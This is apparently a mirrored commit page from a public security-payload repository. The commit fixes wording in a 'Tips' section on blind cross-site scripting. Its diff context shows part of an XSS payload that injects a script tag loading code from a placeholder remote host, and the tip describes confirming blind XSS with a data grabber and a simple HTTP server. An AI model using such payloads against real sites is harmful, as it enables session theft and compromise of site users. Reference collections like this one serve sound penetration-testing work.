mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-22 20:36:12 +00:00
Merge pull request #378 from PinkDev1/patch-3
Fixed typo/wording on "Tips" section in Blind-XSS
This commit is contained in:
commit
18556c2caf
@ -454,7 +454,7 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
||||
|
||||
### Tips
|
||||
|
||||
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
|
||||
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
|
||||
|
||||
Eg. payload
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user